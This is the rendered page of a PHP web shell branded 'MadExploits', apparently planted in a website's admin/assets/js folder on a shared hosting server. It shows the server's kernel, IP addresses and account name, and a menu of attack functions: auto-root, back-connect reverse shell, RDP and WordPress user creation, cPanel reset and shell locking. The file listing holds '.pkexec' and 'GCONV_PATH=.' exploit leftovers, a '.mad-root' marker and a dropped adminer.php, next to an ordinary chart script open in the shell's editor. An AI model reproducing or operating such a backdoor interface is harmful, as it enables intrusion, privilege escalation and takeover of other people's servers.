Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
admin /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bootstrap-datepicker.js
45.72
KB
-rw-r--r--
bootstrap-table.js
49.31
KB
-rw-r--r--
bootstrap.js
59.26
KB
-rw-r--r--
bootstrap.min.js
31.07
KB
-rw-r--r--
chart-data.js
3.39
KB
-rw-r--r--
chart.min.js
49.74
KB
-rw-r--r--
custom.js
115.1
KB
-rw-r--r--
custom.min.js
70.75
KB
-rw-r--r--
easypiechart-data.js
534
B
-rw-r--r--
easypiechart.js
8.85
KB
-rw-r--r--
html5shiv.min.js
2.57
KB
-rw-r--r--
jquery-1.11.1.min.js
93.54
KB
-rw-r--r--
jquery.min.js
93.54
KB
-rw-r--r--
lumino.glyphs.js
63.94
KB
-rw-r--r--
respond.min.js
4.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chart-data.js
var randomScalingFactor = function(){ return Math.round(Math.random()*1000)}; var lineChartData = { labels : ["January","February","March","April","May","June","July"], datasets : [ { label: "My First dataset", fillColor : "rgba(220,220,220,0.2)", strokeColor : "rgba(220,220,220,1)", pointColor : "rgba(220,220,220,1)", pointStrokeColor : "#fff", pointHighlightFill : "#fff", pointHighlightStroke : "rgba(220,220,220,1)", data : [randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor()] }, { label: "My Second dataset", fillColor : "rgba(48, 164, 255, 0.2)", strokeColor : "rgba(48, 164, 255, 1)", pointColor : "rgba(48, 164, 255, 1)", pointStrokeColor : "#fff", pointHighlightFill : "#fff", pointHighlightStroke : "rgba(48, 164, 255, 1)", data : [randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor()] } ] } var barChartData = { labels : ["January","February","March","April","May","June","July"], datasets : [ { fillColor : "rgba(220,220,220,0.5)", strokeColor : "rgba(220,220,220,0.8)", highlightFill: "rgba(220,220,220,0.75)", highlightStroke: "rgba(220,220,220,1)", data : [randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor()] }, { fillColor : "rgba(48, 164, 255, 0.2)", strokeColor : "rgba(48, 164, 255, 0.8)", highlightFill : "rgba(48, 164, 255, 0.75)", highlightStroke : "rgba(48, 164, 255, 1)", data : [randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor(),randomScalingFactor()] } ] } var pieData = [ { value: 300, color:"#30a5ff", highlight: "#62b9fb", label: "Blue" }, { value: 50, color: "#ffb53e", highlight: "#fac878", label: "Orange" }, { value: 100, color: "#1ebfae", highlight: "#3cdfce", label: "Teal" }, { value: 120, color: "#f9243f", highlight: "#f6495f", label: "Red" } ]; var doughnutData = [ { value: 300, color:"#30a5ff", highlight: "#62b9fb", label: "Blue" }, { value: 50, color: "#ffb53e", highlight: "#fac878", label: "Orange" }, { value: 100, color: "#1ebfae", highlight: "#3cdfce", label: "Teal" }, { value: 120, color: "#f9243f", highlight: "#f6495f", label: "Red" } ]; window.onload = function(){ var chart1 = document.getElementById("line-chart").getContext("2d"); window.myLine = new Chart(chart1).Line(lineChartData, { responsive: true }); var chart2 = document.getElementById("bar-chart").getContext("2d"); window.myBar = new Chart(chart2).Bar(barChartData, { responsive : true }); var chart3 = document.getElementById("doughnut-chart").getContext("2d"); window.myDoughnut = new Chart(chart3).Doughnut(doughnutData, {responsive : true }); var chart4 = document.getElementById("pie-chart").getContext("2d"); window.myPie = new Chart(chart4).Pie(pieData, {responsive : true }); };
Close